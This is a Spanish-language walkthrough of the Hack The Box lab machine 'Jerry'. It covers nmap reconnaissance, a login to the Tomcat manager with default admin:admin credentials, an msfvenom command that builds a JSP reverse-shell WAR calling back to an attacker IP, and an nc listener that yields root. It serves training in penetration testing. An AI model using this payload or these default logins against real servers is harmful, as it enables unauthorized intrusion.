# Jerry

### 🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 10.10.10.95
```

para verificar la conectividad de red.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FxJnSiFHF2JaZdjZpg1Bc%2Fimage.png?alt=media&#x26;token=7cb54d71-e822-4ea8-83ba-ac0cb4bbe8a4" alt=""><figcaption></figcaption></figure>

A continuación, realizamos el comando:

```bash
nmap -sC -sV 10.10.10.95
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FJZKFvpWpmVKUssWgdDcw%2Fimage.png?alt=media&#x26;token=024ea00d-85ca-4886-bb8c-ae293966e95b" alt=""><figcaption></figcaption></figure>

Durante el escaneo se identificaron los siguientes puertos abiertos:

* **Puerto 8080 (HTTP)**: Se ha detectado un servidor web Apache Tomcat con la versión 7.0.88 en ejecución. Esta versión puede contener vulnerabilidades conocidas, por lo que se recomienda verificar exploits públicos relacionados.

A continuación, se procederá a analizar cada uno de estos servicios en busca de posibles vectores de ataque.

### 🔎 EXPLORACIÓN

Se utiliza el comando:

```bash
sudo nmap -sCV -p8080 -v 10.10.10.95
```

para que nos proporcione más información sobre esos puertos específicamente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fob8ZYNyMjhea6DsjhyVv%2Fimage.png?alt=media&#x26;token=db08b7ec-6cb9-443a-93d6-953fc671a145" alt=""><figcaption></figcaption></figure>

Revisando el puerto 8080 nos encontramos con un Apache Tomcat por lo que nos intentamos loguear con las credenciales por defecto.

{% embed url="<https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/tomcat/index.html>" %}

Nos logueamos con **admin**:**admin.**

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fq0PCv8XO88SZPKh8YIq7%2Fimage.png?alt=media&#x26;token=1bddb80e-e5bc-494f-afcf-63f506e4df9a" alt=""><figcaption></figcaption></figure>

Nos salen unas credenciales para loguearnos.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FafEFM4hzKcQGdT5naJl8%2Fimage.png?alt=media&#x26;token=a8225da3-f191-4d49-9e98-838cccea43cf" alt=""><figcaption></figcaption></figure>

### 🚀 **EXPLOTACIÓN**

Vemos que podemos subir archivos por lo que creamos uno malicioso.

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 -f war -o reverse2.war
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FvT5Khtchen8O1cftSFtu%2Fimage.png?alt=media&#x26;token=34cc079f-fbef-42cf-a6f0-b2340f311bf5" alt=""><figcaption></figcaption></figure>

Nos ponemos en escucha.

```
nc -nlvp 443
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FQ7VfrEWrdrVdZa7Bpq7Q%2Fimage.png?alt=media&#x26;token=941dfea9-3193-40c6-93e3-3e87dea94b35" alt=""><figcaption></figcaption></figure>

### 🔐 **PRIVILEGIOS**

Al estar dentro y ejecutar:

```bash
whoami
```

somos **root.**

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fjk4xrAb967gUbOG4KqGI%2Fimage.png?alt=media&#x26;token=6176af6a-8838-43c6-8983-ed1da60a763a" alt=""><figcaption></figcaption></figure>

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fvm6E6rXeoONigkIu2oK4%2Fimage.png?alt=media&#x26;token=6571f54c-d0f7-4e2d-b35b-e723ea7df392" alt=""><figcaption></figcaption></figure>

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FPELcSeXwS7r6d6yH3P8v%2Fimage.png?alt=media&#x26;token=6b953706-b11a-456b-8551-bec55a55fdcb" alt=""><figcaption></figcaption></figure>
